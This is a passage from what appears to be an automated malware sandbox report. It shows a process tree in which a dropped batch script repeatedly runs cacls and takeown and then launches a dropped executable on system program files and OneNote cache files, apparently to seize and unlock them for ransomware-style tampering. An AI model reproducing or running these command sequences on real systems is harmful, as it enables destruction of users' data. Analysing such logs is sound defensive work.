  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:7968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7980
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8172
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5132
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5976
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5216
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5208
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:5288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:5444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:5784
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5468
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:7684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    PID:6880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:3756
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:6580
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:6692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:6804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:7144
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:7800
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:5860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7972
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:6828
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:5744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1652
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6096
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
  2⤵
  PID:3548
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:3552
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:1976
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""
  2⤵
  PID:2892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C
    3⤵
    PID:740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"
    3⤵
    - Modifies file permissions
    PID:6108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000009.bin" -nobanner
    3⤵
    PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000009.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:3256
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""
  2⤵
  PID:2852
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000N.bin" -nobanner
    3⤵
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000000N.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:6172
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4940
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin""
  2⤵
  PID:6492
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin" /E /G Admin:F /C
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin"
    3⤵
    PID:4040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000011.bin" -nobanner
    3⤵
    PID:5644
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000011.bin" -nobanner
      4⤵
      Executes dropped EXE
      PID:5560
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin""
  2⤵
  PID:5640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin" /E /G Admin:F /C
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin"
    3⤵
    PID:7284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000006D.bin" -nobanner
    3⤵
    PID:5568
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000006D.bin" -nobanner
      4⤵
      PID:5564
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin""
  2⤵
  PID:7472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin" /E /G Admin:F /C
    3⤵
    PID:6788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin"
    3⤵
    PID:6388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000006N.bin" -nobanner
    3⤵
    PID:6524
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000006N.bin" -nobanner
      4⤵
      PID:6212
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin""
  2⤵
  PID:4812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin" /E /G Admin:F /C
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin"
    3⤵
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000007V.bin" -nobanner
    3⤵
    PID:6292
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000007V.bin" -nobanner
      4⤵
      PID:6284
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin""
  2⤵
  PID:6432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin" /E /G Admin:F /C
    3⤵
    PID:7436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin"
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000089.bin" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000089.bin" -nobanner
      4⤵
      PID:7152
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3572
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""
  2⤵
  PID:6300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C
    3⤵
    PID:7808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"
    3⤵
    PID:7620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000009B.bin" -nobanner
    3⤵
    PID:7156
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000009B.bin" -nobanner
      4⤵
      PID:6372
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""
  2⤵
  PID:6356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"
    3⤵
    PID:7688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000009L.bin" -nobanner
    3⤵
    PID:7704
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "0000009L.bin" -nobanner
      4⤵
      PID:7360
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""
  2⤵
  PID:6812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C
    3⤵
    PID:7280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"
    3⤵
    PID:7584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000A6.bin" -nobanner
    3⤵
    PID:7316
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000A6.bin" -nobanner
      4⤵
      PID:6776
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""
  2⤵
  PID:5756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C
    3⤵
    PID:6792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"
    3⤵
    - Modifies file permissions
    PID:6860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000AH.bin" -nobanner
    3⤵
    PID:4516
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000AH.bin" -nobanner
      4⤵
      PID:1744
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "000000B7.bin" -nobanner
    3⤵
    PID:7636
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "000000B7.bin" -nobanner
      4⤵
      PID:3476
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:7596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    PID:7828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:280
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:292
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:7940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:8104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    PID:7860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:8040
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:8172
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui""
  2⤵
  PID:4856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\PhotoViewer.dll.mui"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1688
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:5020
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "00000008.bin" -nobanner
    3⤵
    PID:5188
  - - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
      SjGmrQ0e.exe -accepteula "00000008.bin" -nobanner
      4⤵
      PID:3324
- - C:\Users\Admin\AppData\Local\Temp\SjGmrQ0e.exe
    SjGmrQ0e.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSy2cokG.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""
  2⤵
  PID:5468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"
    3⤵
    PID:5308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c SjGmrQ0e.exe -accepteula "0000000M.bin" -nobanner
    3⤵
    PID:5580
